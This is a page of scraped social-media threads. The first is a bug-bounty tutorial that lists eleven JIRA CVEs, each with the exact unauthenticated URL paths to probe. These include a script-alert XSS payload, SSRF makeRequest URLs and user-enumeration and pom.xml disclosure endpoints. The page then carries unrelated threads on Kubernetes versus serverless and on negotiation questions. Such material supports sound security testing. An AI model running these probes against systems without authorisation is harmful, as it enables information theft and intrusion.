#Learn365 Day-4: Unauthenticated & Exploitable JIRA Vulnerabilities

There are multiple security vulnerabilities associated with the various versions of JIRA software which are exploited in wild and is one of my personal favourite 3rd Party apps to hunt.



1. CVE-2020-14179 (Information Disclosure)
a. Navigate to /secure/QueryComponent!Default.jspa
b. It leaks information about custom fields, custom SLA, etc.

2. CVE-2020-14181 (User Enumeration)
a. Navigate to /secure/ViewUserHover.jspa?username=
3. CVE-2020-14178 (Project Key Enumeration)
a. Navigate to /browse.
b. Observe the error message on valid vs. invalid project key. Apart from the Enumeration, you can often get unauthenticated access to the project if the protections are not in place.
4. CVE-2019-3402 (XSS)
a. Navigate to /secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search

5. CVE-2019-11581 (SSTI)
a. Navigate to /secure/ContactAdministrators!default.jspa
6. CVE-2019-3396 (Path Traversal)
7. CVE-2019-8451 (SSRF)
a. Navigate to /plugins/servlet/gadgets/makeRequest?url=https://:[email protected]
8. CVE-2019-8451 (SSRF)
a. Navigate to /plugins/servlet/gadgets/makeRequest?url=https://:[email protected]
9. CVE-2019-8449 (User Information Disclosure)
a. Navigate to /rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
b. Observe that the user related information will be available.
10. CVE-2019-3403 (User Enumeration)
a. Navigate to /rest/api/2/user/picker?query=
b. Observe the difference in response when valid vs. invalid user is queried.

11. CVE-2019-8442 (Sensitive Information Disclosure)

a. Navigate to /s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
b. Observe that the pom.xml file is accessible.
Tools: Nuclei Template can be used to automate most of these CVEs Detection.
H1 Reports:
- https://t.co/AaXKHt4NZZ
- https://t.co/hNrzpDgB5A
- https://t.co/ZMVc80vrYQ

More from Software

Kubernetes vs Serverless offerings

Why would you need Kubernetes when there are offerings like Vercel, Netlify, or AWS Lambda/Amplify that basically manage everything for you and offer even more?

Well, let's try to look at both approaches and draw our own conclusions!


1️⃣ A quick look at Kubernetes

Kubernetes is a container orchestrator and thus needs containers to begin with. It's a paradigm shift to more traditional software development, where components are developed, and then deployed to bare metal machines or VMs.

There are additional steps now: Making sure your application is suited to be containerized (12-factor apps, I look at you:
https://t.co/nuH4dmpUmf), containerizing the application, following some pretty well-proven standards, and then pushing the image to a registry.

After all that, you need to write specs which instruct Kubernetes what the desired state of your application is, and finally let Kubernetes do its work. It's certainly not a NoOps platform, as you'll still need people knowing what they do and how to handle Kubernetes.

2️⃣ A quick look at (some!) serverless offerings

The offer is pretty simple: You write the code, the platform handles everything else for you. It's basically leaning far to the NoOps side. There is not much to manage anymore.

Take your Next.js / Nuxt.js app, point the ...

You May Also Like

1/“What would need to be true for you to….X”

Why is this the most powerful question you can ask when attempting to reach an agreement with another human being or organization?

A thread, co-written by @deanmbrody:

2/ First, “X” could be lots of things. Examples: What would need to be true for you to

- “Feel it's in our best interest for me to be CMO"
- “Feel that we’re in a good place as a company”
- “Feel that we’re on the same page”
- “Feel that we both got what we wanted from this deal

3/ Normally, we aren’t that direct. Example from startup/VC land:

Founders leave VC meetings thinking that every VC will invest, but they rarely do.

Worse over, the founders don’t know what they need to do in order to be fundable.

4/ So why should you ask the magic Q?

To get clarity.

You want to know where you stand, and what it takes to get what you want in a way that also gets them what they want.

It also holds them (mentally) accountable once the thing they need becomes true.

5/ Staying in the context of soliciting investors, the question is “what would need to be true for you to want to invest (or partner with us on this journey, etc)?”

Multiple responses to this question are likely to deliver a positive result.